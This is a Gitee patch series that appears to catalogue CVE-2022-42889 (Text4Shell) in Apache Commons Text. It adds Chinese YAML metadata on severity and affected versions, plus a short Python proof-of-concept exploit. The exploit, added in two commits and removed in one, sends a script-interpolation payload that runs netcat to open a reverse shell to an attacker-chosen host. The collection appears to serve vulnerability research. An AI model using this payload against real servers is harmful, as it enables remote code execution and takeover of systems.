From 8d4828406fc8df8b14b257671ac020074e390584 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 08:55:16 +0000 Subject: [PATCH 01/27] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202022?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache/2022/.keep diff --git a/cve/apache/2022/.keep b/cve/apache/2022/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 405ba45065823f53f65dde3ff40ed44efd42deaa Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 08:55:29 +0000 Subject: [PATCH 02/27] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache/2022/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache/2022/.keep diff --git a/cve/apache/2022/.keep b/cve/apache/2022/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 4f451aa9e11ff2110ed4d5f56f98eecb66c7aede Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 08:56:00 +0000 Subject: [PATCH 03/27] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202022?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache/2022/.keep diff --git a/cve/apache/2022/.keep b/cve/apache/2022/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 2bbe5dcee1bc370b559142392aafdcd301da6d77 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 08:56:26 +0000 Subject: [PATCH 04/27] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-42889?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache/2022/CVE-2022-42889/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache/2022/CVE-2022-42889/.keep diff --git a/cve/apache/2022/CVE-2022-42889/.keep b/cve/apache/2022/CVE-2022-42889/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 44aae53e68fae39d4cdf3454f8a0538ee98957bd Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 08:56:49 +0000 Subject: [PATCH 05/27] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache/2022/yaml/.keep diff --git a/cve/apache/2022/yaml/.keep b/cve/apache/2022/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From a99b6178378b59e1101d010c3211d5e6dde3fd07 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 08:57:01 +0000 Subject: [PATCH 06/27] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache/2022/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache/2022/.keep diff --git a/cve/apache/2022/.keep b/cve/apache/2022/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 8c3aef0f930304d8db6724f680240a2c745cc433 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 08:57:55 +0000 Subject: [PATCH 07/27] add CVE-2022-42889 Signed-off-by: begann --- cve/apache/2022/CVE-2022-42889/README.md | 2 ++ .../2022/CVE-2022-42889/text4shell_exploit.py | 20 +++++++++++++++++++ 2 files changed, 22 insertions(+) create mode 100644 cve/apache/2022/CVE-2022-42889/README.md create mode 100644 cve/apache/2022/CVE-2022-42889/text4shell_exploit.py diff --git a/cve/apache/2022/CVE-2022-42889/README.md b/cve/apache/2022/CVE-2022-42889/README.md new file mode 100644 index 00000000..3ddbbd0a --- /dev/null +++ b/cve/apache/2022/CVE-2022-42889/README.md @@ -0,0 +1,2 @@ +# CVE-2022-42889-Text4Shell-Exploit-POC +CVE-2022-42889 Text4Shell Exploit POC diff --git a/cve/apache/2022/CVE-2022-42889/text4shell_exploit.py b/cve/apache/2022/CVE-2022-42889/text4shell_exploit.py new file mode 100644 index 00000000..a7776571 --- /dev/null +++ b/cve/apache/2022/CVE-2022-42889/text4shell_exploit.py @@ -0,0 +1,20 @@ +import requests +import sys + +if(len(sys.argv) != 6): + print("Usage: python3 exploit.py ") + sys.exit(0) + +URL = sys.argv[1] +param_name = sys.argv[2] +lhost = sys.argv[3] +lport = sys.argv[4] +type = sys.argv[5] + +cmd = "nc " + lhost + " " + lport + " -e " + type +payload="${script:javascript:java.lang.Runtime.getRuntime().exec('" + cmd + "')}" + +PARAMS = {param_name:payload} + +r = requests.get(url = URL, params = PARAMS) +print(r.text) -- Gitee From 7b8eeef0fbb425ef4884ddcb5ff59e1d0a1030f6 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 08:58:01 +0000 Subject: [PATCH 08/27] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache/2022/CVE-2022-42889/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache/2022/CVE-2022-42889/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache/2022/CVE-2022-42889/.keep diff --git a/cve/apache/2022/CVE-2022-42889/.keep b/cve/apache/2022/CVE-2022-42889/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From d29f4cdeeef276818b8574999fa0ef2224a7c468 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 09:04:45 +0000 Subject: [PATCH 09/27] add cve/apache/2022/yaml/CVE-2022-42889.yaml. Signed-off-by: begann --- cve/apache/2022/yaml/CVE-2022-42889.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/apache/2022/yaml/CVE-2022-42889.yaml diff --git a/cve/apache/2022/yaml/CVE-2022-42889.yaml b/cve/apache/2022/yaml/CVE-2022-42889.yaml new file mode 100644 index 00000000..73bd97f4 --- /dev/null +++ b/cve/apache/2022/yaml/CVE-2022-42889.yaml @@ -0,0 +1,19 @@ +id: CVE-2022-42889 +source: https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC +info: + name: Apache Commons Text 库包含许多有用的实用程序方法来处理字符串,超出了核心 Java 提供的方法。 + severity: CRITICAL + description: | + Apache Commons Text 1.10.0 版本之前允许对文本进行相关的变量解析。CVE-2022-42889 中,在Apache Commons Text 1.5 ~1.9 版本中,攻击者可构造恶意文本,使得Apache Commons Text 在解析时执行任意代码,控制服务器。漏洞利用需要具体代码依赖。 + scope-of-influence: + 1.5 <= Apache Commons Text <= 1.9 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-42889 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-42889 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None + tags: CVE-2022, Apache Commons Text \ No newline at end of file -- Gitee From d410575308ad72db4b41d51f4f98bc043b393db2 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 09:04:52 +0000 Subject: [PATCH 10/27] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache/2022/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache/2022/yaml/.keep diff --git a/cve/apache/2022/yaml/.keep b/cve/apache/2022/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 1ce0c470b05532a83750807266a073874de3c304 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 09:05:35 +0000 Subject: [PATCH 11/27] update other_list.yaml. Signed-off-by: begann --- other_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/other_list.yaml b/other_list.yaml index 516c3adc..39c100ab 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -22,4 +22,6 @@ cve: - CVE-2021-1056 java-spring-cloud-gateway: - CVE-2022-22947 + apache-commons-text: + - CVE-2022-42889 cnvd: -- Gitee From 90cd1ac3fe6bce3e74b236ebc951378c420d2f60 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 09:32:53 +0000 Subject: [PATCH 12/27] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache/2022/yaml/CVE-2022-42889.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache/2022/yaml/CVE-2022-42889.yaml | 19 ------------------- 1 file changed, 19 deletions(-) delete mode 100644 cve/apache/2022/yaml/CVE-2022-42889.yaml diff --git a/cve/apache/2022/yaml/CVE-2022-42889.yaml b/cve/apache/2022/yaml/CVE-2022-42889.yaml deleted file mode 100644 index 73bd97f4..00000000 --- a/cve/apache/2022/yaml/CVE-2022-42889.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: CVE-2022-42889 -source: https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC -info: - name: Apache Commons Text 库包含许多有用的实用程序方法来处理字符串,超出了核心 Java 提供的方法。 - severity: CRITICAL - description: | - Apache Commons Text 1.10.0 版本之前允许对文本进行相关的变量解析。CVE-2022-42889 中,在Apache Commons Text 1.5 ~1.9 版本中,攻击者可构造恶意文本,使得Apache Commons Text 在解析时执行任意代码,控制服务器。漏洞利用需要具体代码依赖。 - scope-of-influence: - 1.5 <= Apache Commons Text <= 1.9 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-42889 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-42889 - cwe-id: CWE-94 - cnvd-id: None - kve-id: None - tags: CVE-2022, Apache Commons Text \ No newline at end of file -- Gitee From 7a29e03955821170a00dfaff935a9de62f00d8e4 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 09:33:11 +0000 Subject: [PATCH 13/27] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache/2022/CVE-2022-42889/text4shell=5Fexploit.py?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2022/CVE-2022-42889/text4shell_exploit.py | 20 ------------------- 1 file changed, 20 deletions(-) delete mode 100644 cve/apache/2022/CVE-2022-42889/text4shell_exploit.py diff --git a/cve/apache/2022/CVE-2022-42889/text4shell_exploit.py b/cve/apache/2022/CVE-2022-42889/text4shell_exploit.py deleted file mode 100644 index a7776571..00000000 --- a/cve/apache/2022/CVE-2022-42889/text4shell_exploit.py +++ /dev/null @@ -1,20 +0,0 @@ -import requests -import sys - -if(len(sys.argv) != 6): - print("Usage: python3 exploit.py ") - sys.exit(0) - -URL = sys.argv[1] -param_name = sys.argv[2] -lhost = sys.argv[3] -lport = sys.argv[4] -type = sys.argv[5] - -cmd = "nc " + lhost + " " + lport + " -e " + type -payload="${script:javascript:java.lang.Runtime.getRuntime().exec('" + cmd + "')}" - -PARAMS = {param_name:payload} - -r = requests.get(url = URL, params = PARAMS) -print(r.text) -- Gitee From 7da55c570f1bb9b0c844f60895974cab0a08bf23 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 09:33:26 +0000 Subject: [PATCH 14/27] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache/2022/CVE-2022-42889/README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache/2022/CVE-2022-42889/README.md | 2 -- 1 file changed, 2 deletions(-) delete mode 100644 cve/apache/2022/CVE-2022-42889/README.md diff --git a/cve/apache/2022/CVE-2022-42889/README.md b/cve/apache/2022/CVE-2022-42889/README.md deleted file mode 100644 index 3ddbbd0a..00000000 --- a/cve/apache/2022/CVE-2022-42889/README.md +++ /dev/null @@ -1,2 +0,0 @@ -# CVE-2022-42889-Text4Shell-Exploit-POC -CVE-2022-42889 Text4Shell Exploit POC -- Gitee From 14fc2c70ba2445eb764c3f75dba332355aa5c896 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 09:34:02 +0000 Subject: [PATCH 15/27] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-commons-text?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-commons-text/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-commons-text/.keep diff --git a/cve/apache-commons-text/.keep b/cve/apache-commons-text/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 818cf4965af2daff4b19b181020df6261714c69f Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 09:34:14 +0000 Subject: [PATCH 16/27] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202022?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-commons-text/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-commons-text/2022/.keep diff --git a/cve/apache-commons-text/2022/.keep b/cve/apache-commons-text/2022/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From e21c3d1a4bf52d04c5ecbb1dd23766613467af7e Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 09:34:27 +0000 Subject: [PATCH 17/27] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-42889?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-commons-text/2022/CVE-2022-42889/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-commons-text/2022/CVE-2022-42889/.keep diff --git a/cve/apache-commons-text/2022/CVE-2022-42889/.keep b/cve/apache-commons-text/2022/CVE-2022-42889/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 9b925ffc77cf7d660f5612df00d3e47f3974450b Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 09:35:13 +0000 Subject: [PATCH 18/27] add CVE-2022-42889 Signed-off-by: begann --- .../2022/CVE-2022-42889/README.md | 2 ++ .../2022/CVE-2022-42889/text4shell_exploit.py | 20 +++++++++++++++++++ 2 files changed, 22 insertions(+) create mode 100644 cve/apache-commons-text/2022/CVE-2022-42889/README.md create mode 100644 cve/apache-commons-text/2022/CVE-2022-42889/text4shell_exploit.py diff --git a/cve/apache-commons-text/2022/CVE-2022-42889/README.md b/cve/apache-commons-text/2022/CVE-2022-42889/README.md new file mode 100644 index 00000000..3ddbbd0a --- /dev/null +++ b/cve/apache-commons-text/2022/CVE-2022-42889/README.md @@ -0,0 +1,2 @@ +# CVE-2022-42889-Text4Shell-Exploit-POC +CVE-2022-42889 Text4Shell Exploit POC diff --git a/cve/apache-commons-text/2022/CVE-2022-42889/text4shell_exploit.py b/cve/apache-commons-text/2022/CVE-2022-42889/text4shell_exploit.py new file mode 100644 index 00000000..a7776571 --- /dev/null +++ b/cve/apache-commons-text/2022/CVE-2022-42889/text4shell_exploit.py @@ -0,0 +1,20 @@ +import requests +import sys + +if(len(sys.argv) != 6): + print("Usage: python3 exploit.py ") + sys.exit(0) + +URL = sys.argv[1] +param_name = sys.argv[2] +lhost = sys.argv[3] +lport = sys.argv[4] +type = sys.argv[5] + +cmd = "nc " + lhost + " " + lport + " -e " + type +payload="${script:javascript:java.lang.Runtime.getRuntime().exec('" + cmd + "')}" + +PARAMS = {param_name:payload} + +r = requests.get(url = URL, params = PARAMS) +print(r.text) -- Gitee From 6db0888cdde21e0ced3b301cf2e0f4a931069a5d Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 09:35:22 +0000 Subject: [PATCH 19/27] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-commons-text/2022/CVE-2022-42889/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-commons-text/2022/CVE-2022-42889/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-commons-text/2022/CVE-2022-42889/.keep diff --git a/cve/apache-commons-text/2022/CVE-2022-42889/.keep b/cve/apache-commons-text/2022/CVE-2022-42889/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From dd5eb63c2f543a53bc5b52a0141d1436b0139d80 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 09:35:43 +0000 Subject: [PATCH 20/27] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-commons-text/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-commons-text/2022/yaml/.keep diff --git a/cve/apache-commons-text/2022/yaml/.keep b/cve/apache-commons-text/2022/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 9f1f10c38b2b00a5d4cba47ea2fc3eceef7ebb7a Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 09:36:10 +0000 Subject: [PATCH 21/27] add CVE-2022-42889 Signed-off-by: begann --- .../2022/yaml/CVE-2022-42889.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml diff --git a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml new file mode 100644 index 00000000..73bd97f4 --- /dev/null +++ b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml @@ -0,0 +1,19 @@ +id: CVE-2022-42889 +source: https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC +info: + name: Apache Commons Text 库包含许多有用的实用程序方法来处理字符串,超出了核心 Java 提供的方法。 + severity: CRITICAL + description: | + Apache Commons Text 1.10.0 版本之前允许对文本进行相关的变量解析。CVE-2022-42889 中,在Apache Commons Text 1.5 ~1.9 版本中,攻击者可构造恶意文本,使得Apache Commons Text 在解析时执行任意代码,控制服务器。漏洞利用需要具体代码依赖。 + scope-of-influence: + 1.5 <= Apache Commons Text <= 1.9 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-42889 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-42889 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None + tags: CVE-2022, Apache Commons Text \ No newline at end of file -- Gitee From 3b1cc16a6a7cfb50337012ec0a569f340bac0bf0 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 09:36:16 +0000 Subject: [PATCH 22/27] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-commons-text/2022/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-commons-text/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-commons-text/2022/yaml/.keep diff --git a/cve/apache-commons-text/2022/yaml/.keep b/cve/apache-commons-text/2022/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From be796ddfbe0a01fab786caf5efc0308e944d3672 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 09:36:27 +0000 Subject: [PATCH 23/27] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-commons-text/2022/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-commons-text/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-commons-text/2022/.keep diff --git a/cve/apache-commons-text/2022/.keep b/cve/apache-commons-text/2022/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 91c5c927dd4410ccf5e8a7eec32d32e6adacdb4c Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 09:36:49 +0000 Subject: [PATCH 24/27] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-commons-text/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-commons-text/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-commons-text/.keep diff --git a/cve/apache-commons-text/.keep b/cve/apache-commons-text/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 7145f51678bd861fe57b1530721343735c9fb343 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 10:55:44 +0000 Subject: [PATCH 25/27] update cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml. Signed-off-by: begann --- cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml index 73bd97f4..d351e0d8 100644 --- a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml +++ b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml @@ -3,7 +3,7 @@ source: https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC info: name: Apache Commons Text 库包含许多有用的实用程序方法来处理字符串,超出了核心 Java 提供的方法。 severity: CRITICAL - description: | + description: Apache Commons Text 1.10.0 版本之前允许对文本进行相关的变量解析。CVE-2022-42889 中,在Apache Commons Text 1.5 ~1.9 版本中,攻击者可构造恶意文本,使得Apache Commons Text 在解析时执行任意代码,控制服务器。漏洞利用需要具体代码依赖。 scope-of-influence: 1.5 <= Apache Commons Text <= 1.9 -- Gitee From 5146dd652d4918796b5fe6169830cb67b03ec2d8 Mon Sep 17 00:00:00 2001 From: begann Date: Thu, 16 Mar 2023 11:04:40 +0000 Subject: [PATCH 26/27] update cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml. Signed-off-by: begann --- cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml index d351e0d8..191fb4bf 100644 --- a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml +++ b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml @@ -1,10 +1,10 @@ id: CVE-2022-42889 source: https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC info: - name: Apache Commons Text 库包含许多有用的实用程序方法来处理字符串,超出了核心 Java 提供的方法。 + name: Apache Commons Text远程代码执行漏洞 severity: CRITICAL description: - Apache Commons Text 1.10.0 版本之前允许对文本进行相关的变量解析。CVE-2022-42889 中,在Apache Commons Text 1.5 ~1.9 版本中,攻击者可构造恶意文本,使得Apache Commons Text 在解析时执行任意代码,控制服务器。漏洞利用需要具体代码依赖。 + Apache Commons Text 1.10.0版本之前允许对文本进行相关的变量解析。在Apache Commons Text版本1.5~1.9中,攻击者可构造恶意文本,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。 scope-of-influence: 1.5 <= Apache Commons Text <= 1.9 reference: -- Gitee From a1012534a9a260707457a7ad609e0fadc2de54cc Mon Sep 17 00:00:00 2001 From: begann Date: Fri, 17 Mar 2023 03:00:05 +0000 Subject: [PATCH 27/27] update cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml. Signed-off-by: begann --- cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml index 191fb4bf..991427c4 100644 --- a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml +++ b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml @@ -1,7 +1,7 @@ id: CVE-2022-42889 source: https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC info: - name: Apache Commons Text远程代码执行漏洞 + name: Apache Commons Text项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。 severity: CRITICAL description: Apache Commons Text 1.10.0版本之前允许对文本进行相关的变量解析。在Apache Commons Text版本1.5~1.9中,攻击者可构造恶意文本,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。 @@ -9,6 +9,7 @@ info: 1.5 <= Apache Commons Text <= 1.9 reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-42889 + - https://zhuanlan.zhihu.com/p/575580463 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 -- Gitee